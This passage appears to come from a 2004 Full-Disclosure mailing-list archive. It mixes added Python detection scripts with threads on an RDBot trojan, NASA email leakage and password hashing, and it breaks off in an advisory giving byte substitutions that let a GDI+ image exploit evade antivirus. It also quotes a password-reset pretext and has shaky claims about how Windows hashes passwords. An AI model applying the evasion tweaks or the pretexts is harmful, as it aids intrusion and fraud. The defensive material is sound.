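LINE_RE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")
IRC_PORTS = {6667}      # the port seen in the thread; extend for your environment
SMB_PORT = 445
SCAN_THRESHOLD = 5      # distinct 445 targets before a host counts as "spreading"


def parse_events(text):
    """Yield (src, dst, dport) from key=value lines; lines that do not parse are skipped."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m["src"], m["dst"], int(m["dport"])


def triage(text, scan_threshold=SCAN_THRESHOLD):
    """Return {src: {"smb_targets": n, "irc_peers": [...], "verdict": str}}.

    A host is only called a likely bot when BOTH signals are present: the SMB
    fan-out on its own could be a legitimate scanner, and IRC on its own could be
    a person chatting. Correlating the two per source host is what makes the
    verdict meaningful.
    """
    smb_targets = defaultdict(set)
    irc_peers = defaultdict(set)
    for src, dst, dport in parse_events(text):
        if dport == SMB_PORT:
            smb_targets[src].add(dst)
        elif dport in IRC_PORTS:
            irc_peers[src].add(dst)

    report = {}
    for src in set(smb_targets) | set(irc_peers):
        n = len(smb_targets[src])
        irc = sorted(irc_peers[src])
        if n >= scan_threshold and irc:
            verdict = "likely IRC bot spreading over SMB"
        elif n >= scan_threshold:
            verdict = "SMB fan-out, no C2 seen"
        elif irc:
            verdict = "IRC traffic only"
        else:
            verdict = "normal"
        report[src] = {"smb_targets": n, "irc_peers": irc, "verdict": verdict}
    return report


if __name__ == "__main__":
    for src, info in sorted(triage(SAMPLE_LOG).items()):
        print(src, info)
```

On the constructed data only 10.0.0.15 trips both signals; the host that talks to one file server on 445 and the host that merely uses IRC are reported but not accused. Tune SCAN_THRESHOLD to the size of your network: a bot probing random addresses will exceed any sensible value within seconds.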


RE: [SPAM] RE: [Full-Disclosure] interesting trojan found

2004-10-21 Thread Todd Towles
I see.

For some reason, I was thinking he couldn't see it in systemprocess, but
now that I think about it, you are correct. So it was hiding but not
very well, therefore not the true trojan/rootkit hybrid. Thanks Peter.

 -Original Message-
 From: Peter Kruse [mailto:[EMAIL PROTECTED] 
 Sent: Thursday, October 21, 2004 11:33 AM
 To: Todd Towles; [EMAIL PROTECTED]
 Subject: SV: [SPAM] RE: [Full-Disclosure] interesting trojan found
 
 Hi Todd,
 
 But if it is a rootkit, does it not hide from normal AV scanning?
 
 Nope, you'll see it in the systemprocess, but since it's 
 active in memory, you won't be able to end it.
 
 The trojan is an RDBot variant (Spybot). Like other variants 
 from this string, it spreads across local and remote 
 networks. It uses several exploits to compromise unpatched 
 MS Windows boxes, as well as searching for shares with weak 
 passwords. When executed, it creates a mutex [rxBot v0.6.5 
 pk + ftpd]. If another instance of this worm is already 
 running, it will exit. The malware carries a backdoor that 
 allows a malicious user to control the infected host through 
 IRC channels. As stated in the first posting, it drops a 
 copy of itself to the Windows system folder. Next up it 
 modifies the registry with several runas keys under the value 
 update run msword.
 
 This RDbot includes a keylogger that will log all keyboard 
 activity and save it to a text file. A remote user can 
 collect this information through IRC and possibly gain access 
 to other services.
 
 ---
 Med venlig hilsen // Kind regards
 
 Peter Kruse                    Voice: (+45) 88136030
 Security and virus analyst     Cell: (+45) 28490532
 CSIS ApS                       Fax: (+45) 28176030
 http://www.csis.dk             E-mail: [EMAIL PROTECTED]
 
 PGP fingerprint
 79FD 0648 158E 6B9E 236F  CFDA 7C58 64D6 BE83 FA60
 
 Combined Services & Integrated Solutions, Gevno Gade 11a, 4660 
 Store Heddinge, Denmark
 
 

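
Peter Kruse's description above gives a defender two host-side artefacts to look for: a Run value named "update run msword" and a binary dropped into the Windows system folder. A quick way to check a fleet is to export the Run keys (reg export) and scan the text. The following is an added example for this archive, not CSIS code or anything from the thread; the .reg text is constructed, the dropped file name is a placeholder because the post does not give one, and the ALLOWLIST of legitimate system32 autoruns is an assumption you would replace with your own baseline.

```python
"""Scan a Windows .reg export for the autorun artefacts described in the thread:
a Run value named "update run msword" and unexpected binaries autorunning from the
system folder. Added example; the sample export below is constructed, not from a
real host."""
import re

# Constructed `reg export` style text. DROPPED_PLACEHOLDER.exe is a placeholder:
# the post only says the bot copies itself into the Windows system folder.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SynTPEnh"="C:\\Program Files\\Synaptics\\SynTP\\SynTPEnh.exe"
"update run msword"="C:\\WINDOWS\\system32\\DROPPED_PLACEHOLDER.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"update run msword"="C:\\WINDOWS\\system32\\DROPPED_PLACEHOLDER.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"""

# Value name quoted in the thread; add your own indicators here.
KNOWN_BAD_NAMES = {"update run msword"}
# Assumed baseline: binaries that legitimately autorun from system32 on the
# XP-era hosts under discussion. Build this from a known-clean machine.
ALLOWLIST = {"ctfmon.exe"}
SYSTEM_DIR_RE = re.compile(r"^[A-Za-z]:\\windows\\system32\\", re.IGNORECASE)
KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')


def parse_reg(text):
    """Yield (key, value_name, data) for REG_SZ values in a .reg export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        km = KEY_RE.match(line)
        if km:
            key = km.group(1)
            continue
        vm = VALUE_RE.match(line)
        if vm and key:
            # .reg files escape each backslash in string data as \\
            yield key, vm["name"], vm["data"].replace("\\\\", "\\")


def find_autorun_indicators(text):
    """Return [(key, value_name, command, reason)] for suspicious Run entries."""
    hits = []
    for key, name, data in parse_reg(text):
        if not key.lower().endswith("\\currentversion\\run"):
            continue
        exe = data.strip('"').split("\\")[-1].lower()
        if name.lower() in KNOWN_BAD_NAMES:
            hits.append((key, name, data, "value name matches known bot indicator"))
        elif SYSTEM_DIR_RE.match(data) and exe not in ALLOWLIST:
            hits.append((key, name, data, "unexpected binary autorun from system folder"))
    return hits


if __name__ == "__main__":
    for key, name, data, reason in find_autorun_indicators(SAMPLE_REG):
        print(f"{reason}: [{key}] {name!r} -> {data}")
```

The second rule matters more than the first over time: the value name a bot family uses changes between builds, but "something in system32 that is not on my baseline is set to autorun" stays a useful question, and it is exactly the kind of check Regshot-style snapshot comparison would also surface.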


RE: [Full-Disclosure] OT: Opening for Security Researcher, Maryland USA

2004-10-21 Thread Todd Towles
You should post this to the security job mailing list at SecurityFocus. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 David Stein
 Sent: Thursday, October 21, 2004 3:16 PM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] OT: Opening for Security 
 Researcher, Maryland USA
 
 OK, this is off-topic, but it can't be as bad as Bush vs. 
 Kerry arguments.  Hopefully this at least will make some 
 lucky subscriber to Full Disclosure some money!
 
 --
 --
 
 JOB DESCRIPTION
 ---
 Position:   Security Researcher
 Type:   Permanent F/T
 Closing Date:   11/20/2004
 
 I have a job opening for a computer scientist with a strong 
 interest in computer security. The ideal applicant would be 
 an intelligent person with a solid computing background (both 
 theoretical and practical) who would like to participate in 
 and contribute to computer security research.
 
 The job is in our Internal Research and Development 
 organization and involves performing vulnerability 
 assessments of applications and networks using both static 
 (code review, configuration review) and dynamic (black-box) 
 analysis.  It is expected that the researcher will develop 
 proof-of-concept demonstrations of any vulnerabilities 
 discovered.  It is also expected that the researcher will be 
 able to set-up and configure applications and networks for analysis.
 
 JOB REQUIREMENTS
 ---
 Demonstrated expertise in software reverse engineering using 
 common tools such as IDA Pro and OllyDbg.  Ability to perform 
 protocol analysis using common tools such as Ethereal and 
 tcpdump.  Ability to write software in Python and/or Perl.  
 Sound understanding of common techniques for detection and 
 exploitation of common software vulnerabilities such as 
 buffer overflows, format strings and SQL injection.  
 Familiarity with X86 or other assembly language. 
 Experience with setup and configuration of Unix and/or Linux systems. 
 Experience with hardware reverse engineering desirable.  
 Experience with telecommunications systems helpful.  
 Typically requires Masters or Bachelors degree in Computer 
 Science or a related discipline with two years of experience 
 or equivalent acquired knowledge through practical technical 
 experience.  U.S. Citizenship required. 
 Applicants selected will be subject to a background 
 investigation and must meet eligibility requirements for 
 access to classified information.
 
 CONTACT
 ---
 If interested, go to http://www.gd-ais.com, select 'Careers', 
 then 'GDAIS Careers', search openings for Req. Number 7371, 
 and apply online.  Or you can send your resume to me (ASCII 
 only please).
 --
 David Stein
 [EMAIL PROTECTED]
 
 



RE: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu?

2004-10-21 Thread Todd Towles
I second that, do we hear a third? 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of KF_lists
 Sent: Thursday, October 21, 2004 1:36 PM
 To: [EMAIL PROTECTED] [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Will a vote for John Kerry be 
 counted by a Hart InterCivic eSlate3000 in Honolulu?
 
 Support Apathy! I don't give a shit... do you?
 
 Until you are debating over who has the best malloc() 
 ninjitsu technique or which one of them can exploit a shatter 
 attack, QUIT discussing the candidates!
 
 -KF
 
 
   The question comes to mind... why oh why did you cast your vote for
   Kerry?
   I guess you want the US to be policed and governed by the UN. I
   guess you want someone in office that can't make up his mind about
   anything. I guess you want someone in office that will start to
   shred the Constitution piece by piece and change it bit by bit until
   it reads like the Heinz Ketchup bottle ingredients.
  
   But, it's your vote, you can vote for anyone that you wish, I'll
   defend that right to the end, even if Kerry wants to take it away.
  
   My vote will be PROUDLY cast for Bush, just like it was 4 years ago.
  
   Exibar
 
 
 



RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!

2004-10-20 Thread Todd Towles
Changing it is an option, but that is true for any password cracking. But
of course changing the password makes your presence really known. 

 -Original Message-
 From: Aviv Raff [mailto:[EMAIL PROTECTED] 
 Sent: Wednesday, October 20, 2004 1:16 AM
 To: Todd Towles; 'Pavel Kankovsky'; [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] Senior M$ member says stop 
 using passwords completely!
 
 If they crack it, they might be able to automatically change 
 the password to a readable one.
 
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Todd Towles
 Sent: Tuesday, October 19, 2004 10:42 PM
 To: Pavel Kankovsky; [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] Senior M$ member says stop 
 using passwords completely!
 
 
 I was under the understanding that passwords of over 14 
 characters were stored with a more secure hash, therefore 14-
 character passwords were harder to crack, due to the more 
 secure hash. Windows will create two different hashes for 
 passwords shorter than 14 characters, I do believe.
 
 Just use a non-printable character in your password and 
 cracking is useless...if they crack it, they can't read what 
 they cracked. ;) 
 
  -Original Message-
  From: [EMAIL PROTECTED]
  [mailto:[EMAIL PROTECTED] On Behalf Of Pavel 
  Kankovsky
  Sent: Sunday, October 17, 2004 2:21 PM
  To: [EMAIL PROTECTED]
  Subject: Re: [Full-Disclosure] Senior M$ member says stop using 
  passwords completely!
  
  On Sat, 16 Oct 2004, Frank Knobbe wrote:
  
    It's a nice recommendation of MS to make (to use long passphrases 
    instead of passwords). But I don't consider 14 chars a passphrase.
    Perhaps they should enable more/all password components to handle 
    much longer passwords/phrases.
   
   A passphrase consisting of 7 words and 12 bits of entropy per word 
   is as guessable as a password with 14 characters and 6 bits of 
   entropy per character. You get 84 bits of total entropy in both cases.
   
   The only advantage of passphrases is that lusers might find long 
   random sequences of words easier to remember than long random 
   sequences of characters.
   
   (But wait: 12 bits of entropy per word--this is equivalent to a 
   uniform choice of one word out of 4096. 4 thousand? That might 
   exceed an average luser's vocabulary by an order of magnitude! ;)
  
  --Pavel Kankovsky aka Peak  [ Boycott 
  Microsoft--http://www.vcnet.com/bms ] Resistance is futile.
  Open your source code and prepare for assimilation.
  
  
 
 
 
 



RE: [Full-Disclosure] interesting trojan found

2004-10-20 Thread Todd Towles
Yep, PEBuilder will allow you to make a Windows XP/2003 live boot-up CD.
I also believe Knoppix 3.4 will allow you to write to NTFS once you
change the permissions on the mount to read and write. It mounts read-only
by default, for security of course. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Danny
 Sent: Wednesday, October 20, 2004 1:10 PM
 To: Richard Stevens
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] interesting trojan found
 
 On Wed, 20 Oct 2004 17:51:26 +0100, Richard Stevens 
 [EMAIL PROTECTED] wrote:
  
  b: anyone know a free boot disk that both reads & writes to 
 NTFS, so I can delete it!
 
 If you have a CD-ROM,  http://www.nu2.nu/pebuilder/.
 
 ...D
 
 



RE: [Full-Disclosure] why o why did NASA do this.

2004-10-19 Thread Todd Towles
I meant this outdated NASA e-mail list. I understand that FD could be
used for this purpose.

The fact that NASA just hands you this information (outdated or not) is
pretty sad. As I stated before, it is free information leakage at best,
and because it is outdated it should be removed from public view. This
could be used for social attacks and e-mail attacks. I don't think
SPAMmers care about some 6-year-old list but hackers would. Any
information that they can get free of charge is just that much better.

You know me better than that GuidoZ .lol 

 -Original Message-
 From: GuidoZ [mailto:[EMAIL PROTECTED] 
 Sent: Tuesday, October 19, 2004 1:24 AM
 To: Todd Towles
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] why o why did NASA do this.
 
  how would this list help me spam?
 
 Google your email address - then simply use a bot to gather 
 ALL the email addresses listed in the posts along with it. ;) 
 The sad fact is that the email addresses used to post to this 
 list (and any others like it) are freely there for the 
 taking. Plus, it's quite obvious they are active. (More 
 obvious than, say, email addies from 1996?) ;)
 
 --
 Peace. ~G
 
 
 On Mon, 18 Oct 2004 11:02:00 -0500, Todd Towles 
 [EMAIL PROTECTED] wrote:
  Exactly as I stated earlier...this is just information leakage...old 
  as it might be, it helps...the people on the list are just doing their 
  jobs...getting paid and giving information to an employee that knows 
  their name (and is higher in the company) seems harmless. Spam isn't 
  the issue with this information leakage, I can buy a CD with 6 million 
  e-mail addresses on it...how would this list help me spam?
  
  
  
   -Original Message-
   From: [EMAIL PROTECTED]
   [mailto:[EMAIL PROTECTED] On Behalf Of 
   KF_lists
   Sent: Monday, October 18, 2004 9:06 AM
   To: Harry de Grote
   Cc: [EMAIL PROTECTED]
   Subject: Re: [Full-Disclosure] why o why did NASA do this.
  
  
   Forget about the spammers, how about social engineers. This is quite 
   the gold mine for that.
  
   "Hi, this is Joe Schmoe from building 69, I need to have my password 
   reset."
   -KF
  
  
   
    I have to admit... it's pretty old and useless, but I think this may
    be a nice place for spammers to try out some new addresses...
   
  
  
  
 
 



RE: [Full-Disclosure] why o why did NASA do this.

2004-10-19 Thread Todd Towles
 
GuidoZ wrote:
 =) Yeah, I do. I wasn't sure if you were having a brain fart 
 or something. lol
Ok Mr. Limpy..lol

 Well said. It was finally removed from public view, though 
 I'd imagine quite a few saved it just in case (myself 
 included). No, it's not some perfect list for every malicious 
 purpose, though it's certainly better than nothing. Spammers 
 really don't care if it's active or not - they will still 
 sell it. Social Engineering can go a long way though. It's 
 entirely possible someone that worked at NASA in 1996 would 
 be there still today. It's called a career. =)
Great point about the career job. Even if they aren't there, knowing a
time and a name can get you more information out of a person in another
dept, I think. I wouldn't try =) 

-Todd

 --
 Peace. ~G
 
 
 On Tue, 19 Oct 2004 07:59:36 -0500, Todd Towles 
 [EMAIL PROTECTED] wrote:
  I meant this outdated NASA e-mail list. I understand that FD could be 
  used for this purpose.
  
  The fact that NASA just hands you this information (outdated or not) 
  is pretty sad. As I stated before, it is free information leakage at 
  best, and because it is outdated it should be removed from public view. 
  This could be used for social attacks and e-mail attacks. I don't 
  think SPAMmers care about some 6-year-old list but hackers would. Any 
  information that they can get free of charge is just that much better.
  
  You know me better than that GuidoZ .lol
  
   -Original Message-
   From: GuidoZ [mailto:[EMAIL PROTECTED]
   Sent: Tuesday, October 19, 2004 1:24 AM
   To: Todd Towles
   Cc: [EMAIL PROTECTED]
   Subject: Re: [Full-Disclosure] why o why did NASA do this.
  
how would this list help me spam?
  
   Google your email address - then simply use a bot to gather ALL the 
   email addresses listed in the posts along with it. ;) The sad fact 
   is that the email addresses used to post to this list (and any 
   others like it) are freely there for the taking. Plus, it's quite 
   obvious they are active. (More obvious than, say, email addies from 
   1996?) ;)
  
   --
   Peace. ~G
  
  
   On Mon, 18 Oct 2004 11:02:00 -0500, Todd Towles 
   [EMAIL PROTECTED] wrote:
    Exactly as I stated earlier...this is just information leakage...old
    as it might be, it helps...the people on the list are just doing their
    jobs...getting paid and giving information to an employee that 
    knows their name (and is higher in the company) seems harmless.
    Spam isn't the issue with this information leakage, I can buy a CD
    with 6 million e-mail addresses on it...how would this list help me spam?
   
   
   
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 KF_lists
 Sent: Monday, October 18, 2004 9:06 AM
 To: Harry de Grote
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] why o why did NASA do this.


     Forget about the spammers, how about social engineers. This is quite
     the gold mine for that.
    
     "Hi, this is Joe Schmoe from building 69, I need to have my 
     password reset."
     -KF


 
      I have to admit... it's pretty old and useless, but I think this may
      be a nice place for spammers to try out some new addresses...
 


   
   
  
 
 



RE: [Full-Disclosure] Windows Time Synchronization - Best Practices

2004-10-19 Thread Todd Towles



As everyone knows, there is very little that is OT on FD...so if you don't have 
anything nice to say...shhh! lol

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Richard Stevens
 Sent: Tuesday, October 19, 2004 12:22 PM
 To: Bernardo Santos Wernesback; [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] Windows Time Synchronization - Best Practices
 
 Why FD? What are the direct security implications of this?
 
 I'm sure someone can construct a rather tenuous link, but really
 
  -Original Message-
  From: [EMAIL PROTECTED] 
  [mailto:[EMAIL PROTECTED] On Behalf Of Bernardo Santos Wernesback
  Sent: 19 October 2004 16:05
  To: [EMAIL PROTECTED]
  Subject: [Full-Disclosure] Windows Time Synchronization - Best Practices
  
  Hello everyone,
  
  I was wondering if anyone has or could point me to some sort of paper 
  describing best-practices related to time synchronization and the 
  configuration of daylight savings.
  
  Basically my problem is deciding if I should or shouldn't use Windows' 
  option to autoconfigure daylight savings but I'd like to see 
  recommendations from known companies.
  
  I am also open to suggestions from the Full-disclosure community but my 
  recommendations have to be justified to my boss ;)
  
  Thanks for any pointers!
  
  See ya,
  
  Bernardo Santos Wernesback
  [EMAIL PROTECTED]


RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!

2004-10-19 Thread Todd Towles
I was under the understanding that passwords of over 14 characters were
stored with a more secure hash, therefore 14-character passwords were
harder to crack, due to the more secure hash. Windows will create two
different hashes for passwords shorter than 14 characters, I do
believe.

Just use a non-printable character in your password and cracking is
useless...if they crack it, they can't read what they cracked. ;) 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Pavel Kankovsky
 Sent: Sunday, October 17, 2004 2:21 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Senior M$ member says stop 
 using passwords completely!
 
 On Sat, 16 Oct 2004, Frank Knobbe wrote:
 
  It's a nice recommendation of MS to make (to use long passphrases 
  instead of passwords). But I don't consider 14 chars a passphrase.
  Perhaps they should enable more/all password components to 
 handle much 
  longer passwords/phrases.
 
 A passphrase consisting of 7 words and 12 bits of entropy per 
 word is as guessable as a password with 14 characters and 6 
 bits of entropy per character. You get 84 bits of total 
 entropy in both cases.
 
 The only advantage of passphrases is that lusers might find 
 long random sequences of words easier to remember than long 
 random sequences of characters.
 
 (But wait: 12 bits of entropy per word--this is equivalent 
 to a uniform choice of one word out of 4096. 4 thousand? That 
 might exceed an average luser's vocabulary by an order of 
 magnitude! ;)
 
 --Pavel Kankovsky aka Peak  [ Boycott 
 Microsoft--http://www.vcnet.com/bms ] Resistance is futile. 
 Open your source code and prepare for assimilation.
 
 

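
Pavel's arithmetic above (which also appears quoted in the earlier message of this thread) generalises to any alphabet: entropy per symbol is log2 of the number of equally likely choices, and total entropy is that times the number of symbols. The following is an added example for this archive, not from the thread; it reproduces the 84-bit equivalence for the numbers Pavel uses and then lets you ask the reverse question, how many characters or words a given target needs. The 95-character alphabet (printable ASCII) and the 7776-word list size are assumptions chosen to illustrate the reverse calculation.

```python
"""Password vs. passphrase entropy, generalising the thread's 7 x 12 = 14 x 6 = 84.
Added example; not from the Full-Disclosure posts."""
import math


def bits_per_symbol(alphabet_size):
    """Entropy of one symbol (character or word) chosen uniformly from alphabet_size."""
    return math.log2(alphabet_size)


def total_entropy(symbols, alphabet_size):
    """Entropy in bits of a secret made of `symbols` independent uniform choices."""
    return symbols * bits_per_symbol(alphabet_size)


def symbols_needed(target_bits, alphabet_size):
    """Smallest symbol count whose total entropy reaches target_bits."""
    return math.ceil(target_bits / bits_per_symbol(alphabet_size))


def expected_guesses(bits):
    """Average work for exhaustive search: half the space of 2**bits."""
    return 2 ** (bits - 1)


if __name__ == "__main__":
    # The thread's two cases: 4096-word vocabulary (12 bits/word) and a
    # 64-symbol character set (6 bits/char). Both come out at 84 bits.
    print("7 words from 4096:", total_entropy(7, 4096))
    print("14 chars from 64:", total_entropy(14, 64))
    # Reverse question with assumed alphabets: printable ASCII (95) and a
    # 7776-word list (assumptions, not figures from the thread).
    print("chars of printable ASCII for 84 bits:", symbols_needed(84, 95))
    print("words from a 7776-word list for 84 bits:", symbols_needed(84, 7776))
    print("expected guesses at 84 bits:", expected_guesses(84))
```

The only thing the calculation cannot capture is the caveat Todd raises in this thread: entropy assumes the verifier stores the secret with a hash that does not itself cap or split the input, so the storage format has to be checked separately from the arithmetic.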


RE: [Full-Disclosure] Full-Disclosure Posts

2004-10-18 Thread Todd Towles
Well, I didn't take offense...a lot of companies are very lazy with
security...just wanted to throw in my 2 cents. 

Just look at all the pen-testing companies..that throw you a nessus
report with a logo on top of it. They have never tested the reported
hole with another method or even tried any other hacking method
(social). Don't worry, I see your point too clearly. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 [EMAIL PROTECTED]
 Sent: Sunday, October 17, 2004 2:54 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Full-Disclosure Posts
 
 On Sun, 17 Oct 2004 12:34:33 -0500, Todd Towles 
 [EMAIL PROTECTED] wrote:
  I agree with your idea, but I am one of those uni graduate/20 
  something professionals. I am very passionate about my work and the 
  security of the company I work for. I work in a rural state and the 
  money isn't as high as some other places. I took a pay cut to work in 
  the IT field when I finished college.
  
  Maybe you weren't talking about people like myself in your statement 
  (since most people that are part of FD are here to be on the edge of 
  security and around people that understand them) but it seemed like 
  you were talking in pretty general terms...with that in mind I have 
  to disagree with you that all the 20 something professionals are not 
  good security professionals. A lot of the older folks are sitting in 
  the corner talking about their 1980 modems, while some 15 year old 
  from South America uses a three year old exploit on their 
  misconfigured Apache webserver and defaces it.
  
  I agree that you have to love computers...you have to eat and sleep 
  computers/security to be good in the field and a lot of people in the 
  IT field aren't like that. Kinda sad, but I will have their job one 
  day..so..I just smile.
  
 
 
 My motivation is yahoo.. these guys need to wake up more. 
 Everything about them says they are out of touch with the 
 threats of today. If you report X, they patch X, even if they 
 know Y and Z are vulnerable, the apparent attitude is to 
 leave Y and Z until they get reported or become an active 
 problem, because they want to move onto the next reported 
 vulnerability. From the idea I get, it's all about what looks 
 good on paper and productivity. I mean, I bet yahoo hand out 
 most productive security employee of the month awards and 
 stuff. It's all screwed up and wrong.
 
 My stance is.. yahoo sack all the ones who are in it for the 
 money, keep the employees who think like a hacker, then 
 recruit some real life hackers from the underground. That 
 combination is a winning security team, not the current team 
 who in my opinion are out of touch and out dated for the 
 threats of the 21st century.
 
 As for misconfigured web servers with 3 year old exploits, 
 Yahoo! don't even need exploits and misconfigured web 
 servers. They do fine by cutting corners and taking short 
 cuts in security. Half the network is vulnerable to all 
 manner of stuff. In my opinion, the only threat to Yahoo are 
 Yahoo themselves, not hackers.
 
 Sorry to go on about yahoo, but it's something I'm passionate about.
 
 Feel free to hit the block sender button, I fully understand. 
 
 :-)
 
 



RE: [Full-Disclosure] why o why did NASA do this.

2004-10-18 Thread Todd Towles
Exactly as I stated earlier...this is just information leakage...old as
it might be, it helps...the people on the list are just doing their
jobs...getting paid and giving information to an employee that knows
their name (and is higher in the company) seems harmless. Spam isn't the
issue with this information leakage, I can buy a CD with 6 million
e-mail addresses on it...how would this list help me spam? 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of KF_lists
 Sent: Monday, October 18, 2004 9:06 AM
 To: Harry de Grote
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] why o why did NASA do this.
 
 
 Forget about the spammers, how about social engineers. This 
 is quite the gold mine for that.
 
 "Hi, this is Joe Schmoe from building 69, I need to have my 
 password reset."
 -KF
 
 
  
  I have to admit... it's pretty old and useless, but I think 
  this may be a nice place for spammers to try out some new addresses...
  
 
 



RE: [Full-Disclosure] Full-Disclosure Posts

2004-10-17 Thread Todd Towles
I agree with your idea, but I am one of those uni graduate/20 something
professionals. I am very passionate about my work and the security of the
company I work for. I work in a rural state and the money isn't as high
as some other places. I took a pay cut to work in the IT field when I
finished college. 

Maybe you weren't talking about people like myself in your statement
(since most people that are part of FD are here to be on the edge of
security and around people that understand them) but it seemed like you
were talking in pretty general terms...with that in mind I have to
disagree with you that all the 20 something professionals are not good
security professionals. A lot of the older folks are sitting in the
corner talking about their 1980 modems, while some 15 year old from
South America uses a three year old exploit on their misconfigured
Apache webserver and defaces it.

I agree that you have to love computers...you have to eat and sleep
computers/security to be good in the field and a lot of people in the IT
field aren't like that. Kinda sad, but I will have their job one
day..so..I just smile.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 [EMAIL PROTECTED]
 Sent: Sunday, October 17, 2004 7:58 AM
 To: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Full-Disclosure Posts
 
 On Sat, 16 Oct 2004 19:13:18 -0700, Etaoin Shrdlu 
 [EMAIL PROTECTED] wrote:
  Of course, anyone still using the term hax0r as though it were 
  meaningful might want to think further about what a security 
  professional might be
 
 
 
 
 A security professional is someone who cares more about money 
 than the real issue of security at where they work. They 
 don't go the extra mile for the interests of security at 
 where they work, as they don't want to risk the job they're in.
 
 My view is corporations should not employ uni graduates and 
 thirty-somethings to work in a security team. They very 
 likely still can't open a can of beans and certainly have no 
 idea about the real issues which face them. They follow 
 company policy and go home at the end of the day, and switch off.
 
 The people who should be working at a security team should be 
 volunteers who have the real interests of the company in 
 mind, instead of money.
 
 The security professional as we know it (uni graduate and 30 
 something) is not a hax0r, they are Ph.D. or whatever who are 
 skilled on an academic level, and that's as far as it goes, 
 which in my opinion isn't far enough.
 
 Being a security professional is meant to be about passion, 
 strictly not money, in my humble opinion.
 
 Stop employing academics and get the hackers in to do the job 
 properly, unpaid of course, at least to start off with, to 
 make sure they're joining the company for the right reasons. ;-)
 
 



RE: [Full-Disclosure] why o why did NASA do this.

2004-10-17 Thread Todd Towles
Oh yeah..I am sure if you called and pretended to be someone, they would
ask for your ID number? If you believe that any company (including NASA)
has all their employees in a security mind frame then you haven't tried.
You could start to piece together all types of information. This is
information leakage that isn't needed. They might as well all send us an
e-mail with their internet-connected IP address. The information is out
there but to offer it in this way is just lazy.

Anyone want to start putting a phone list for these people together? ;)

My 2 cents.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Adam Jones
 Sent: Sunday, October 17, 2004 9:18 AM
 To: Andrew Smith
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] why o why did NASA do this.
 
 The majority of the list had nothing more than
 
 alias $name $email
 
 Only small parts had any more specific contact information. 
 The emails provided seem to all have been @nasa.gov anyways. 
 (did not actually search for exceptions on this other than 
 eyeballing it) Most likely any mail sent to these addresses 
 would be filtered, especially spam.
 It probably is not much of a security risk, as calling them to 
 say "I am Brantly Hanks, Deputy Chief Engineer" would get a 
 response of "Ok, give me your employee ID number to verify you."
 
 At the same time, handing all of this out to everyone and 
 anyone is just making that much more work for yourself.
 
 



RE: [Full-Disclosure] Bypass of Antivirus software with GDI+ bug exploit Mutations

2004-10-14 Thread Todd Towles
TrendMicro sees it as an MS04-028 exploit 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Andrey Bayora
 Sent: Thursday, October 14, 2004 2:46 AM
 To: [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] Bypass of Antivirus software with 
 GDI+ bug exploit Mutations
 
 Bypass of Antivirus software with GDI+ bug exploit Mutations.
 
 HiddenBit.org Security Advisory.
 
 Date: October 14, 2004
 
 Author: Andrey Bayora
 
 
 BACKGROUND
 
 While working on a research paper for the SANS GCIH practical I 
 found this issue, and it seems to me critical enough to warn 
 readers about it.
 
 DESCRIPTION
 
 Most Antivirus software can't detect Mutations of GDI+ exploit.
 
 ANALYSIS
 
 1) Most Antivirus vendors issues virus definitions for known 
 exploit code [1] witch uses \xFF\xFE\x00\x01 string for 
 buffer overflow.
 From the Snort rule [2] you can learn that there are 7 more variants
 to produce this buffer overflow in GDI+.
 
 So, by changing \xFE to one of these (\xE1, \xE2, \xED) 
 and/or by changing \x01 to \x00, this exploit will be 
 UNDETECTED by many antiviruses (list attached).
 
 2) While the original exploit code uses the buffer overflow string 
 near the BEGINNING of the image file (after the \xFF\xE0, 
 \xFF\xEC and \xFF\xEE markers), I was able to create an image 
